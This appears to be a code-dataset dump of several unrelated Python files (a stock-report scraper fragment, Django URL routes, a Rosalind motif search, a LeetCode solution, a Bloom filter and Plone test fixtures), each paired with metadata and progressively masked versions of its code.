= str(html[0])\nstring2 = string1.split('ROWNUM_')\ndf=pd.DataFrame(columns=['Name','code','type','publishDate0','actualDate'])\nfor string in string2:\n name= re.findall(r'companyAbbr\":\"(.+?)\",\"',string)\n code= re.findall(r'companyCode\":\"(.+?)\",\"',string)\n report_type= re.findall(r'bulletinType\":\"(.+?)\",\"',string)\n date = re.findall(r'publishDate0\":\"(.+?)\",\"',string)\n\n actual = re.findall(r'actualDate\":\"(.+?)\",\"',string)\n if len(actual) == 0 and len(date)!=0 and compare_time(str(date[0]),time_string) > 0:\n df=df.append(pd.DataFrame({'Name':name,'code':code,'type':report_type,'publishDate0':date}),ignore_index=True)\ndf.sort_values(by = \"publishDate0\",ascending = True,inplace = True)\n#df= df.iloc[0:16,:]\ndf.to_excel('ready_to_report.xlsx')\n\n\nnp_ready_report = np.unique(np.array(df['code']))\n\n\nnp_increase_report = np.array(result_select.index)\nforcast=pd.DataFrame()\n#forcast=pd.DataFrame(columns=['increase code','forcast code','relation'])\nindex =0;\nfor code1 in np_increase_report:\n for code2 in np_ready_report:\n if cmp(basic.ix[str(code2),'industry'],basic.ix[str(code1),'industry']) == 0:\n \trelation = get_relation(str(code1),str(code2))\n \tforcast.ix[str(index),'increase code'] = code1\n \tforcast.ix[str(index),'forcast code'] = code2\n \tforcast.ix[str(index),'relation'] = relation\n \tforcast.ix[str(index),'publishDate0'] = np.array(df[df['code'].isin([code2])]['publishDate0'])[0]\n \tforcast.ix[str(index),'forcast industry'] = basic.ix[str(code2),'industry']\n 
\tforcast.ix[str(index),'increase industry'] = basic.ix[str(code1),'industry']\n\t\tindex = index +1\n\nforcast.to_excel('forcast.xlsx')\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from django.urls import path
from . import views
urlpatterns = [
    path('', views.home, name='park-home'),
    path('login/', views.login, name='park-login'),
]
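
# Hedged illustration (added; not part of the original snippet): the routes
# above reference views.home and views.login, so a minimal park/views.py
# consistent with those names might look like this (the response bodies are
# assumptions):
#
#     from django.http import HttpResponse
#
#     def home(request):
#         return HttpResponse('park home')
#
#     def login(request):
#         return HttpResponse('park login')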
|
normal
|
{
"blob_id": "2fd490ca54f5d038997cec59a3e07c3f2c2d2538",
"index": 6757,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('', views.home, name='park-home'), path('login/', views\n .login, name='park-login')]\n",
"step-3": "from django.urls import path\nfrom . import views\nurlpatterns = [path('', views.home, name='park-home'), path('login/', views\n .login, name='park-login')]\n",
"step-4": "from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.home, name ='park-home'), \n path('login/', views.login, name ='park-login'), \n]",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
'''
Implement GreedyMotifSearch
http://rosalind.info/problems/ba2d/
Given: Integers k and t, followed by a collection of strings Dna.
Return: A collection of strings BestMotifs resulting from running GreedyMotifSearch(Dna, k, t). If at any step you find more than one Profile-most probable k-mer in a given string, use the one occurring first.
'''
import pandas as pd
from ba1g import hamming_distance
from ba2c import profile_most_probable
filename = 'rosalind_ba2d.txt'
BASES = ['A', 'C', 'G', 'T']
def greedy_motif_search(dnas, k, t):
    # took ~4 min to run on test dataset but seems to be the correct algorithm
    # based on pseudocode (and other peoples' submissions)
    best_motifs = [dna[:k] for dna in dnas]
    best_score = score_motifs(best_motifs)
    for i in range(len(dnas[0]) - k + 1):
        print(i)
        motifs = [dnas[0][i:i+k]]
        for j in range(1, t):
            motifs.append(profile_most_probable(dnas[j], k, form_profile(motifs)))
        score = score_motifs(motifs)
        if score < best_score:
            best_motifs = motifs
            best_score = score
    return best_motifs


def form_profile(motifs):
    profile = pd.DataFrame(0, columns=range(len(motifs[0])), index=BASES)
    for motif in motifs:
        for i, base in enumerate(motif):
            profile.loc[base, i] += 1
    return profile / len(motifs)


def score_motifs(motifs):
    # couldn't figure out what 'score' from pseudocode meant :(
    # had to reference someone else's code:
    # https://github.com/NathanielLovin/Rosalind/blob/master/BA2D.py
    profile = form_profile(motifs)
    # neat df function generates the consensus string
    consensus = ''.join(profile.idxmax())
    return sum(hamming_distance(motif, consensus) for motif in motifs)


def main():
    with open(filename) as f:
        k, t = list(map(int, f.readline().strip().split()))
        dnas = [line.strip() for line in f.readlines()]
    for motif in greedy_motif_search(dnas, k, t):
        print(motif)


if __name__ == '__main__':
    main()
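
# Added note (not part of the original solution): main() expects the file
# named in `filename` to hold k and t on the first line, followed by t DNA
# strings, one per line. A small illustrative input would be:
#
#     3 5
#     GGCGTTCAGGCA
#     AAGAATCAGTCA
#     CAAGGAGTTCGC
#     CACGTCAATCAC
#     CAATAATATTCG
#
# The script then prints one k-mer (here of length 3) per input string.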
|
normal
|
{
"blob_id": "ed7fa6e6f30eb06400cb38128617967a597f6c04",
"index": 2450,
"step-1": "<mask token>\n\n\ndef greedy_motif_search(dnas, k, t):\n best_motifs = [dna[:k] for dna in dnas]\n best_score = score_motifs(best_motifs)\n for i in range(len(dnas[0]) - k + 1):\n print(i)\n motifs = [dnas[0][i:i + k]]\n for j in range(1, t):\n motifs.append(profile_most_probable(dnas[j], k, form_profile(\n motifs)))\n score = score_motifs(motifs)\n if score < best_score:\n best_motifs = motifs\n best_score = score\n return best_motifs\n\n\ndef form_profile(motifs):\n profile = pd.DataFrame(0, columns=range(len(motifs[0])), index=BASES)\n for motif in motifs:\n for i, base in enumerate(motif):\n profile.loc[base, i] += 1\n return profile / len(motifs)\n\n\ndef score_motifs(motifs):\n profile = form_profile(motifs)\n consensus = ''.join(profile.idxmax())\n return sum(hamming_distance(motif, consensus) for motif in motifs)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef greedy_motif_search(dnas, k, t):\n best_motifs = [dna[:k] for dna in dnas]\n best_score = score_motifs(best_motifs)\n for i in range(len(dnas[0]) - k + 1):\n print(i)\n motifs = [dnas[0][i:i + k]]\n for j in range(1, t):\n motifs.append(profile_most_probable(dnas[j], k, form_profile(\n motifs)))\n score = score_motifs(motifs)\n if score < best_score:\n best_motifs = motifs\n best_score = score\n return best_motifs\n\n\ndef form_profile(motifs):\n profile = pd.DataFrame(0, columns=range(len(motifs[0])), index=BASES)\n for motif in motifs:\n for i, base in enumerate(motif):\n profile.loc[base, i] += 1\n return profile / len(motifs)\n\n\ndef score_motifs(motifs):\n profile = form_profile(motifs)\n consensus = ''.join(profile.idxmax())\n return sum(hamming_distance(motif, consensus) for motif in motifs)\n\n\ndef main():\n with open(filename) as f:\n k, t = list(map(int, f.readline().strip().split()))\n dnas = [line.strip() for line in f.readlines()]\n for motif in greedy_motif_search(dnas, k, t):\n print(motif)\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\nfilename = 'rosalind_ba2d.txt'\nBASES = ['A', 'C', 'G', 'T']\n\n\ndef greedy_motif_search(dnas, k, t):\n best_motifs = [dna[:k] for dna in dnas]\n best_score = score_motifs(best_motifs)\n for i in range(len(dnas[0]) - k + 1):\n print(i)\n motifs = [dnas[0][i:i + k]]\n for j in range(1, t):\n motifs.append(profile_most_probable(dnas[j], k, form_profile(\n motifs)))\n score = score_motifs(motifs)\n if score < best_score:\n best_motifs = motifs\n best_score = score\n return best_motifs\n\n\ndef form_profile(motifs):\n profile = pd.DataFrame(0, columns=range(len(motifs[0])), index=BASES)\n for motif in motifs:\n for i, base in enumerate(motif):\n profile.loc[base, i] += 1\n return profile / len(motifs)\n\n\ndef score_motifs(motifs):\n profile = form_profile(motifs)\n consensus = ''.join(profile.idxmax())\n return sum(hamming_distance(motif, consensus) for motif in motifs)\n\n\ndef main():\n with open(filename) as f:\n k, t = list(map(int, f.readline().strip().split()))\n dnas = [line.strip() for line in f.readlines()]\n for motif in greedy_motif_search(dnas, k, t):\n print(motif)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nimport pandas as pd\nfrom ba1g import hamming_distance\nfrom ba2c import profile_most_probable\nfilename = 'rosalind_ba2d.txt'\nBASES = ['A', 'C', 'G', 'T']\n\n\ndef greedy_motif_search(dnas, k, t):\n best_motifs = [dna[:k] for dna in dnas]\n best_score = score_motifs(best_motifs)\n for i in range(len(dnas[0]) - k + 1):\n print(i)\n motifs = [dnas[0][i:i + k]]\n for j in range(1, t):\n motifs.append(profile_most_probable(dnas[j], k, form_profile(\n motifs)))\n score = score_motifs(motifs)\n if score < best_score:\n best_motifs = motifs\n best_score = score\n return best_motifs\n\n\ndef form_profile(motifs):\n profile = pd.DataFrame(0, columns=range(len(motifs[0])), index=BASES)\n for motif in motifs:\n for i, base in enumerate(motif):\n profile.loc[base, i] += 1\n return profile / len(motifs)\n\n\ndef score_motifs(motifs):\n profile = form_profile(motifs)\n consensus = ''.join(profile.idxmax())\n return sum(hamming_distance(motif, consensus) for motif in motifs)\n\n\ndef main():\n with open(filename) as f:\n k, t = list(map(int, f.readline().strip().split()))\n dnas = [line.strip() for line in f.readlines()]\n for motif in greedy_motif_search(dnas, k, t):\n print(motif)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "'''\nImplement GreedyMotifSearch\nhttp://rosalind.info/problems/ba2d/\n\nGiven: Integers k and t, followed by a collection of strings Dna.\n\nReturn: A collection of strings BestMotifs resulting from running GreedyMotifSearch(Dna, k, t). If at any step you find more than one Profile-most probable k-mer in a given string, use the one occurring first.\n'''\nimport pandas as pd\n\nfrom ba1g import hamming_distance\nfrom ba2c import profile_most_probable\n\nfilename = 'rosalind_ba2d.txt'\nBASES = ['A', 'C', 'G', 'T']\n\ndef greedy_motif_search(dnas, k, t):\n\t# took ~4 min to run on test dataset but seems to be the correct algorithm\n\t# based on pseudocode (and other peoples' submissions)\n\tbest_motifs = [dna[:k] for dna in dnas]\n\tbest_score = score_motifs(best_motifs)\n\tfor i in range(len(dnas[0]) - k + 1):\n\t\tprint(i)\n\t\tmotifs = [dnas[0][i:i+k]]\n\t\tfor j in range(1, t):\n\t\t\tmotifs.append(profile_most_probable(dnas[j], k, form_profile(motifs)))\n\t\tscore = score_motifs(motifs)\n\t\tif score < best_score:\n\t\t\tbest_motifs = motifs\n\t\t\tbest_score = score\n\treturn best_motifs\n\ndef form_profile(motifs):\n\tprofile = pd.DataFrame(0, columns=range(len(motifs[0])), index=BASES)\n\tfor motif in motifs:\n\t\tfor i, base in enumerate(motif):\n\t\t\tprofile.loc[base, i] += 1\n\treturn profile / len(motifs)\n\ndef score_motifs(motifs):\n\t# couldn't figure out what 'score' from pseudocode meant :(\n\t# had to reference someone else's code:\n\t# https://github.com/NathanielLovin/Rosalind/blob/master/BA2D.py\n\tprofile = form_profile(motifs)\n\t# neat df function generates the consensus string\n\tconsensus = ''.join(profile.idxmax())\n\treturn sum(hamming_distance(motif, consensus) for motif in motifs)\n\ndef main():\n\twith open(filename) as f:\n\t\tk, t = list(map(int, f.readline().strip().split()))\n\t\tdnas = [line.strip() for line in f.readlines()]\n\tfor motif in greedy_motif_search(dnas, k, t):\n\t\tprint(motif)\n\nif __name__ == '__main__':\n\tmain()\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
from typing import List
h = 5
w = 4
horizontalCuts = [3]
verticalCuts = [3]
class Solution:
    def maxArea(self, h: int, w: int, horizontalCuts: List[int], verticalCuts: List[int]) -> int:
        horizontalCuts.sort()
        verticalCuts.sort()
        horizontalCuts.append(h)
        verticalCuts.append(w)
        hbreadth = 0
        prev = 0
        for h in horizontalCuts:
            height = h - prev
            hbreadth = max(height, hbreadth)
            prev = h

        prev = 0
        vlength = 0
        for v in verticalCuts:
            height = v - prev
            vlength = max(vlength, height)
            prev = v

        maxarea = (hbreadth * vlength) % ((10**9) + 7)
        return maxarea
obj=Solution()
print(obj.maxArea(h, w, horizontalCuts, verticalCuts))
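
# Worked check (added for clarity, not part of the original submission): with
# h=5, w=4, horizontalCuts=[3], verticalCuts=[3], the horizontal gaps are
# [3-0, 5-3] = [3, 2] and the vertical gaps are [3-0, 4-3] = [3, 1], so the
# largest piece has area 3 * 3 = 9, which is what the driver above prints.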
|
normal
|
{
"blob_id": "8fb559810fbf79f0849ed98e51d3f2ad1ccc4b8b",
"index": 8296,
"step-1": "<mask token>\n\n\nclass Solution:\n\n def maxArea(self, h: int, w: int, horizontalCuts: List[int],\n verticalCuts: List[int]) ->int:\n horizontalCuts.sort()\n verticalCuts.sort()\n horizontalCuts.append(h)\n verticalCuts.append(w)\n hbreadth = 0\n prev = 0\n for h in horizontalCuts:\n height = h - prev\n hbreadth = max(height, hbreadth)\n prev = h\n prev = 0\n vlength = 0\n for v in verticalCuts:\n height = v - prev\n vlength = max(vlength, height)\n prev = v\n maxarea = hbreadth * vlength % (10 ** 9 + 7)\n return maxarea\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n\n def maxArea(self, h: int, w: int, horizontalCuts: List[int],\n verticalCuts: List[int]) ->int:\n horizontalCuts.sort()\n verticalCuts.sort()\n horizontalCuts.append(h)\n verticalCuts.append(w)\n hbreadth = 0\n prev = 0\n for h in horizontalCuts:\n height = h - prev\n hbreadth = max(height, hbreadth)\n prev = h\n prev = 0\n vlength = 0\n for v in verticalCuts:\n height = v - prev\n vlength = max(vlength, height)\n prev = v\n maxarea = hbreadth * vlength % (10 ** 9 + 7)\n return maxarea\n\n\n<mask token>\nprint(obj.maxArea(h, w, horizontalCuts, verticalCuts))\n",
"step-3": "<mask token>\nh = 5\nw = 4\nhorizontalCuts = [3]\nverticalCuts = [3]\n\n\nclass Solution:\n\n def maxArea(self, h: int, w: int, horizontalCuts: List[int],\n verticalCuts: List[int]) ->int:\n horizontalCuts.sort()\n verticalCuts.sort()\n horizontalCuts.append(h)\n verticalCuts.append(w)\n hbreadth = 0\n prev = 0\n for h in horizontalCuts:\n height = h - prev\n hbreadth = max(height, hbreadth)\n prev = h\n prev = 0\n vlength = 0\n for v in verticalCuts:\n height = v - prev\n vlength = max(vlength, height)\n prev = v\n maxarea = hbreadth * vlength % (10 ** 9 + 7)\n return maxarea\n\n\nobj = Solution()\nprint(obj.maxArea(h, w, horizontalCuts, verticalCuts))\n",
"step-4": "from typing import List\nh = 5\nw = 4\nhorizontalCuts = [3]\nverticalCuts = [3]\n\n\nclass Solution:\n\n def maxArea(self, h: int, w: int, horizontalCuts: List[int],\n verticalCuts: List[int]) ->int:\n horizontalCuts.sort()\n verticalCuts.sort()\n horizontalCuts.append(h)\n verticalCuts.append(w)\n hbreadth = 0\n prev = 0\n for h in horizontalCuts:\n height = h - prev\n hbreadth = max(height, hbreadth)\n prev = h\n prev = 0\n vlength = 0\n for v in verticalCuts:\n height = v - prev\n vlength = max(vlength, height)\n prev = v\n maxarea = hbreadth * vlength % (10 ** 9 + 7)\n return maxarea\n\n\nobj = Solution()\nprint(obj.maxArea(h, w, horizontalCuts, verticalCuts))\n",
"step-5": "from typing import List\nh = 5\nw = 4\nhorizontalCuts = [3]\nverticalCuts = [3]\nclass Solution:\n def maxArea(self, h: int, w: int, horizontalCuts: List[int], verticalCuts: List[int]) -> int:\n horizontalCuts.sort()\n verticalCuts.sort()\n horizontalCuts.append(h)\n verticalCuts.append(w)\n hbreadth= 0\n prev=0\n for h in horizontalCuts:\n height= h-prev\n hbreadth= max(height, hbreadth)\n prev= h\n\n prev=0\n vlength=0\n for v in verticalCuts:\n height= v-prev\n vlength= max(vlength, height)\n prev=v\n\n maxarea= (hbreadth * vlength) % ((10**9) + 7)\n return maxarea\n\nobj=Solution()\nprint(obj.maxArea(h, w, horizontalCuts, verticalCuts))\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
#coding: utf-8
import mmh3
from bitarray import bitarray
BIT_SIZE = 1 << 30
class BloomFilter:

    def __init__(self):
        # Initialize bloom filter, set size and all bits to 0
        bit_array = bitarray(BIT_SIZE)
        bit_array.setall(0)

        self.bit_array = bit_array

    def add(self, val):
        point_list = self.get_postions(val)

        for b in point_list:
            self.bit_array[b] = 1

    def get_postions(self, val):
        # Get points positions in bit vector.
        # Different hash seeds give multiple hash functions; the seeds should
        # preferably be prime numbers.
        point1 = mmh3.hash(val, 5) % BIT_SIZE
        point2 = mmh3.hash(val, 7) % BIT_SIZE
        point3 = mmh3.hash(val, 11) % BIT_SIZE
        point4 = mmh3.hash(val, 13) % BIT_SIZE
        point7 = mmh3.hash(val, 19) % BIT_SIZE
        point5 = mmh3.hash(val, 23) % BIT_SIZE
        point6 = mmh3.hash(val, 31) % BIT_SIZE

        # note: point7 is computed but not included in the returned list
        return [point1, point2, point3, point4, point5, point6]

    def is_contains(self, val):
        point_list = self.get_postions(val)

        result = True
        for b in point_list:
            result = result and self.bit_array[b]

        return result
if __name__ == '__main__':
    bf = BloomFilter()

    # On the first run this prints 'not exists'
    if bf.is_contains('zqw'):
        print('exists')
    else:
        print('not exists')
        bf.add('zqw')

    if bf.is_contains('shooter'):
        print('exists')
    else:
        bf.add('shooter')

    if bf.is_contains('zqw'):
        print('exists')
    else:
        bf.add('zqw')
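
# Added note (not part of the original script): with m = BIT_SIZE bits and
# k = 6 hash functions, the usual false-positive estimate after inserting n
# items is (1 - exp(-k * n / m)) ** k, e.g.:
#
#     import math
#     def false_positive_rate(n, m=BIT_SIZE, k=6):
#         return (1 - math.exp(-k * n / m)) ** k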
|
normal
|
{
"blob_id": "5a103a4f72b9cd3ea3911aeefeeb2194c8ad7df0",
"index": 589,
"step-1": "<mask token>\n\n\nclass BloomFilter:\n\n def __init__(self):\n bit_array = bitarray(BIT_SIZE)\n bit_array.setall(0)\n self.bit_array = bit_array\n\n def add(self, val):\n point_list = self.get_postions(val)\n for b in point_list:\n self.bit_array[b] = 1\n <mask token>\n\n def is_contains(self, val):\n point_list = self.get_postions(val)\n result = True\n for b in point_list:\n result = result and self.bit_array[b]\n return result\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass BloomFilter:\n\n def __init__(self):\n bit_array = bitarray(BIT_SIZE)\n bit_array.setall(0)\n self.bit_array = bit_array\n\n def add(self, val):\n point_list = self.get_postions(val)\n for b in point_list:\n self.bit_array[b] = 1\n\n def get_postions(self, val):\n point1 = mmh3.hash(val, 5) % BIT_SIZE\n point2 = mmh3.hash(val, 7) % BIT_SIZE\n point3 = mmh3.hash(val, 11) % BIT_SIZE\n point4 = mmh3.hash(val, 13) % BIT_SIZE\n point7 = mmh3.hash(val, 19) % BIT_SIZE\n point5 = mmh3.hash(val, 23) % BIT_SIZE\n point6 = mmh3.hash(val, 31) % BIT_SIZE\n return [point1, point2, point3, point4, point5, point6]\n\n def is_contains(self, val):\n point_list = self.get_postions(val)\n result = True\n for b in point_list:\n result = result and self.bit_array[b]\n return result\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass BloomFilter:\n\n def __init__(self):\n bit_array = bitarray(BIT_SIZE)\n bit_array.setall(0)\n self.bit_array = bit_array\n\n def add(self, val):\n point_list = self.get_postions(val)\n for b in point_list:\n self.bit_array[b] = 1\n\n def get_postions(self, val):\n point1 = mmh3.hash(val, 5) % BIT_SIZE\n point2 = mmh3.hash(val, 7) % BIT_SIZE\n point3 = mmh3.hash(val, 11) % BIT_SIZE\n point4 = mmh3.hash(val, 13) % BIT_SIZE\n point7 = mmh3.hash(val, 19) % BIT_SIZE\n point5 = mmh3.hash(val, 23) % BIT_SIZE\n point6 = mmh3.hash(val, 31) % BIT_SIZE\n return [point1, point2, point3, point4, point5, point6]\n\n def is_contains(self, val):\n point_list = self.get_postions(val)\n result = True\n for b in point_list:\n result = result and self.bit_array[b]\n return result\n\n\nif __name__ == '__main__':\n bf = BloomFilter()\n if bf.is_contains('zqw'):\n print('exists')\n else:\n print('not exists')\n bf.add('zqw')\n if bf.is_contains('shooter'):\n print('exists')\n else:\n bf.add('shooter')\n if bf.is_contains('zqw'):\n print('exists')\n else:\n bf.add('zqw')\n",
"step-4": "<mask token>\nBIT_SIZE = 1 << 30\n\n\nclass BloomFilter:\n\n def __init__(self):\n bit_array = bitarray(BIT_SIZE)\n bit_array.setall(0)\n self.bit_array = bit_array\n\n def add(self, val):\n point_list = self.get_postions(val)\n for b in point_list:\n self.bit_array[b] = 1\n\n def get_postions(self, val):\n point1 = mmh3.hash(val, 5) % BIT_SIZE\n point2 = mmh3.hash(val, 7) % BIT_SIZE\n point3 = mmh3.hash(val, 11) % BIT_SIZE\n point4 = mmh3.hash(val, 13) % BIT_SIZE\n point7 = mmh3.hash(val, 19) % BIT_SIZE\n point5 = mmh3.hash(val, 23) % BIT_SIZE\n point6 = mmh3.hash(val, 31) % BIT_SIZE\n return [point1, point2, point3, point4, point5, point6]\n\n def is_contains(self, val):\n point_list = self.get_postions(val)\n result = True\n for b in point_list:\n result = result and self.bit_array[b]\n return result\n\n\nif __name__ == '__main__':\n bf = BloomFilter()\n if bf.is_contains('zqw'):\n print('exists')\n else:\n print('not exists')\n bf.add('zqw')\n if bf.is_contains('shooter'):\n print('exists')\n else:\n bf.add('shooter')\n if bf.is_contains('zqw'):\n print('exists')\n else:\n bf.add('zqw')\n",
"step-5": "#coding: utf-8\nimport mmh3\nfrom bitarray import bitarray\n\nBIT_SIZE = 1 << 30\n\nclass BloomFilter:\n\n def __init__(self):\n # Initialize bloom filter, set size and all bits to 0\n bit_array = bitarray(BIT_SIZE)\n bit_array.setall(0)\n\n self.bit_array = bit_array\n\n def add(self, val):\n point_list = self.get_postions(val)\n\n for b in point_list:\n self.bit_array[b] = 1\n\n def get_postions(self, val):\n # Get points positions in bit vector.\n # 提供不同的hash种子得到多个hash函数, seed最好为质数\n\n point1 = mmh3.hash(val, 5) % BIT_SIZE\n point2 = mmh3.hash(val, 7) % BIT_SIZE\n point3 = mmh3.hash(val, 11) % BIT_SIZE\n point4 = mmh3.hash(val, 13) % BIT_SIZE\n point7 = mmh3.hash(val, 19) % BIT_SIZE\n point5 = mmh3.hash(val, 23) % BIT_SIZE\n point6 = mmh3.hash(val, 31) % BIT_SIZE\n\n return [point1, point2, point3, point4, point5, point6]\n\n def is_contains(self, val):\n point_list = self.get_postions(val)\n\n result = True\n for b in point_list:\n result = result and self.bit_array[b]\n\n return result\n\n\nif __name__ == '__main__':\n\n bf = BloomFilter()\n\n # 第一次运行时会显示 not exists\n\n if bf.is_contains('zqw'):\n print('exists')\n else:\n print('not exists')\n bf.add('zqw')\n\n if bf.is_contains('shooter'):\n print('exists')\n else:\n bf.add('shooter')\n\n if bf.is_contains('zqw'):\n print('exists')\n else:\n bf.add('zqw')",
"step-ids": [
4,
5,
6,
7,
9
]
}
|
[
4,
5,
6,
7,
9
] |
from Products.CMFPlone.utils import getFSVersionTuple
from bda.plone.ticketshop.interfaces import ITicketShopExtensionLayer
from plone.app.robotframework.testing import MOCK_MAILHOST_FIXTURE
from plone.app.testing import FunctionalTesting
from plone.app.testing import IntegrationTesting
from plone.app.testing import PLONE_FIXTURE
from plone.app.testing import PloneSandboxLayer
from plone.app.testing import TEST_USER_ID
from plone.app.testing import setRoles
from plone.testing import z2
from zope.interface import alsoProvides
import plone.api
if getFSVersionTuple()[0] >= 5:
    PLONE5 = 1
else:
    PLONE5 = 0


def set_browserlayer(request):
    """Set the BrowserLayer for the request.

    We have to set the browserlayer manually, since importing the profile alone
    doesn't do it in tests.
    """
    alsoProvides(request, ITicketShopExtensionLayer)


class TicketshopLayer(PloneSandboxLayer):
    defaultBases = (PLONE_FIXTURE,)

    def setUpZope(self, app, configurationContext):
        import bda.plone.ticketshop
        self.loadZCML(package=bda.plone.ticketshop,
                      context=configurationContext)

        # Install products that use an old-style initialize() function
        z2.installProduct(app, 'Products.DateRecurringIndex')

    def setUpPloneSite(self, portal):
        self.applyProfile(portal, 'bda.plone.ticketshop:default')

    def tearDownZope(self, app):
        # Uninstall old-style Products
        z2.uninstallProduct(app, 'Products.DateRecurringIndex')


Ticketshop_FIXTURE = TicketshopLayer()
Ticketshop_INTEGRATION_TESTING = IntegrationTesting(
    bases=(Ticketshop_FIXTURE,),
    name="Ticketshop:Integration")
class TicketshopATLayer(PloneSandboxLayer):
    # don't use shop fixture here. looks like, test layers use different ZODB
    # connections and c.z.datagridfield fails with a ZODB object reference
    # error.
    defaultBases = (PLONE_FIXTURE,)

    def setUpZope(self, app, configurationContext):
        import Products.ATContentTypes
        self.loadZCML(package=Products.ATContentTypes,
                      context=configurationContext)

        import bda.plone.ticketshop
        self.loadZCML(package=bda.plone.ticketshop,
                      context=configurationContext)

        # Install products that use an old-style initialize() function
        z2.installProduct(app, 'Products.DateRecurringIndex')

        z2.installProduct(app, 'bda.plone.ticketshop.at')

    def setUpPloneSite(self, portal):
        if PLONE5:
            self.applyProfile(portal, 'Products.ATContentTypes:default')
        self.applyProfile(portal, 'bda.plone.ticketshop.at:default')

        portal.portal_workflow.setDefaultChain("one_state_workflow")
        setRoles(portal, TEST_USER_ID, ['Manager'])

        # Create test users
        cru = plone.api.user.create
        cru(email="[email protected]", username="customer1", password="customer1")
        cru(email="[email protected]", username="customer2", password="customer2")
        cru(email="[email protected]", username="vendor1", password="vendor1")
        cru(email="[email protected]", username="vendor2", password="vendor2")

        # Create test content
        crc = plone.api.content.create

        crc(container=portal, type='Buyable Event', id='folder_1')
        crc(container=portal['folder_1'], type='Ticket', id='item_11',
            title="item_11")
        crc(container=portal['folder_1'], type='Ticket', id='item_12',
            title="item_12")

        crc(container=portal, type='Buyable Event', id='folder_2')
        crc(container=portal['folder_2'], type='Ticket', id='item_21',
            title="item_21")
        crc(container=portal['folder_2'], type='Ticket', id='item_22',
            title="item_22")


TicketshopAT_FIXTURE = TicketshopATLayer()
TicketshopAT_INTEGRATION_TESTING = IntegrationTesting(
    bases=(TicketshopAT_FIXTURE,),
    name="TicketshopAT:Integration")
TicketshopAT_ROBOT_TESTING = FunctionalTesting(
    bases=(
        MOCK_MAILHOST_FIXTURE,
        TicketshopAT_FIXTURE,
        z2.ZSERVER_FIXTURE
    ),
    name="TicketshopAT:Robot")
|
normal
|
{
"blob_id": "5d7080f2778133d1938853512ca038edcf7c0dc4",
"index": 1002,
"step-1": "<mask token>\n\n\nclass TicketshopATLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import Products.ATContentTypes\n self.loadZCML(package=Products.ATContentTypes, context=\n configurationContext)\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n z2.installProduct(app, 'bda.plone.ticketshop.at')\n\n def setUpPloneSite(self, portal):\n if PLONE5:\n self.applyProfile(portal, 'Products.ATContentTypes:default')\n self.applyProfile(portal, 'bda.plone.ticketshop.at:default')\n portal.portal_workflow.setDefaultChain('one_state_workflow')\n setRoles(portal, TEST_USER_ID, ['Manager'])\n cru = plone.api.user.create\n cru(email='[email protected]', username='customer1', password='customer1')\n cru(email='[email protected]', username='customer2', password='customer2')\n cru(email='[email protected]', username='vendor1', password='vendor1')\n cru(email='[email protected]', username='vendor2', password='vendor2')\n crc = plone.api.content.create\n crc(container=portal, type='Buyable Event', id='folder_1')\n crc(container=portal['folder_1'], type='Ticket', id='item_11',\n title='item_11')\n crc(container=portal['folder_1'], type='Ticket', id='item_12',\n title='item_12')\n crc(container=portal, type='Buyable Event', id='folder_2')\n crc(container=portal['folder_2'], type='Ticket', id='item_21',\n title='item_21')\n crc(container=portal['folder_2'], type='Ticket', id='item_22',\n title='item_22')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TicketshopLayer(PloneSandboxLayer):\n <mask token>\n <mask token>\n\n def setUpPloneSite(self, portal):\n self.applyProfile(portal, 'bda.plone.ticketshop:default')\n\n def tearDownZope(self, app):\n z2.uninstallProduct(app, 'Products.DateRecurringIndex')\n\n\n<mask token>\n\n\nclass TicketshopATLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import Products.ATContentTypes\n self.loadZCML(package=Products.ATContentTypes, context=\n configurationContext)\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n z2.installProduct(app, 'bda.plone.ticketshop.at')\n\n def setUpPloneSite(self, portal):\n if PLONE5:\n self.applyProfile(portal, 'Products.ATContentTypes:default')\n self.applyProfile(portal, 'bda.plone.ticketshop.at:default')\n portal.portal_workflow.setDefaultChain('one_state_workflow')\n setRoles(portal, TEST_USER_ID, ['Manager'])\n cru = plone.api.user.create\n cru(email='[email protected]', username='customer1', password='customer1')\n cru(email='[email protected]', username='customer2', password='customer2')\n cru(email='[email protected]', username='vendor1', password='vendor1')\n cru(email='[email protected]', username='vendor2', password='vendor2')\n crc = plone.api.content.create\n crc(container=portal, type='Buyable Event', id='folder_1')\n crc(container=portal['folder_1'], type='Ticket', id='item_11',\n title='item_11')\n crc(container=portal['folder_1'], type='Ticket', id='item_12',\n title='item_12')\n crc(container=portal, type='Buyable Event', id='folder_2')\n crc(container=portal['folder_2'], type='Ticket', id='item_21',\n title='item_21')\n crc(container=portal['folder_2'], type='Ticket', id='item_22',\n title='item_22')\n\n\n<mask token>\n",
